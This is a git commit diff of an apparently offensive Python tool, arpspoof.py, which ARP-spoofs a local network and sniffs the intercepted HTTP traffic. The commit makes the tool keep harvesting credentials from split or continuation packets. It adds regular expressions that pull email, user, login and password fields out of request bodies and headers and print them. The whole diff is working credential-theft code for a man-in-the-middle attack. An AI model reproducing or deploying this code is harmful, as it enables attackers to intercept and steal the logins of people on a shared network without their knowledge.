fixed it so TCP packets that are split or continuations will still be mined for usernames + passwords

2025-07-07 05:22:11 -07:00 · 2013-06-16 14:40:45 -06:00 · 2013-06-16 14:40:45 -06:00 · dde76d312e
commit dde76d312e
parent f2fa9724a3
1 changed files with 44 additions and 37 deletions
--- a/arpspoof.py
+++ b/arpspoof.py
@ -70,6 +70,7 @@ dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/
 			chr(DHCPRevOptions["server_id"][0]),
 			chr(DHCPRevOptions["name_server"][0]),
 			), "end"]))
 ans, unans = srp(dhcp, timeout=5, retry=1)
 if ans:
 	for s,r in ans:
@ -78,6 +79,8 @@ if ans:
 		for idx,x in enumerate(DHCPopt):
 			if 'domain' in x:
 				localDomain = DHCPopt[idx][1]
 			else:
 				localDomain = 'None'
 			if 'name_server' in x:
 				DNSsrvr = DHCPopt[idx][1]
 else:
@ -130,29 +133,48 @@ def URL(pkt):
 			headers = pkt
 			body = ''
-		if args.post and len(headers) < 450 and not get:
+		headLines = headers.split(r"\r\n")
-			username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', body)
+		for l in headLines:
-			password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', body)
+			searchHost = re.search('[Hh]ost: ', l)
-			if username != [] or password != []:
+			searchGet = re.search('GET /', l)
-				print colors.TAN+'[+] Packet may\'ve been split. Data:',body+colors.ENDC
+			searchPost = re.search('POST /', l)
 			if searchHost:
 				host = l.split(' ')
 				host = host[1]
 			if searchGet:
 				get = l.split(' ')
 				get = get[1]
 			if searchPost:
 				post = l.split(' ')
 				post = post[1]
 		if args.post and len(pkt) < 450:
 			if body != '':
-				for x in username:
+				username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', body)
-					for u in x:
+				password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', body)
-						if '=' in u:
+				if username != [] or password != []:
-							print colors.RED+u+colors.ENDC
+					print colors.TAN+'[+] Packet may\'ve been split. Load data:',body+colors.ENDC
-				for y in password:
+					for x in username:
-					for p in y:
+						for u in x:
-						if '=' in p:
+							if '=' in u:
-							print colors.RED+p+colors.ENDC
+								print colors.RED+u+colors.ENDC
-			else:
+					for y in password:
-				for x in username:
+						for p in y:
-					for u in x:
+							if '=' in p:
-						if '=' in u:
+								print colors.RED+p+colors.ENDC
-							print colors.RED+u+colors.ENDC
+			if not get:
-				for y in password:
+				username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', headers)
-					for p in y:
+				password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', headers)
-						if '=' in p:
+				if username != [] or password != []:
-							print colors.RED+p+colors.ENDC
+					print colors.TAN+'[+] Packet may\'ve been split. Load data:',headers+colors.ENDC
 					for x in username:
 						for u in x:
 							if '=' in u:
 								print colors.RED+u+colors.ENDC
 					for y in password:
 						for p in y:
 							if '=' in p:
 								print colors.RED+p+colors.ENDC
 #			username = re.finditer('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', headers)
 #			password = re.finditer('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', headers)
@ -181,21 +203,6 @@ def URL(pkt):
 #					print colors.RED+p.group()+colors.ENDC
 #			counter = 0
 		headLines = headers.split(r"\r\n")
 		for l in headLines:
 			searchHost = re.search('[Hh]ost: ', l)
 			searchGet = re.search('GET /', l)
 			searchPost = re.search('POST /', l)
 			if searchHost:
 				host = l.split(' ')
 				host = host[1]
 			if searchGet:
 				get = l.split(' ')
 				get = get[1]
 			if searchPost:
 				post = l.split(' ')
 				post = post[1]
 		if host and get:
 			url = host+get
 		if host and post: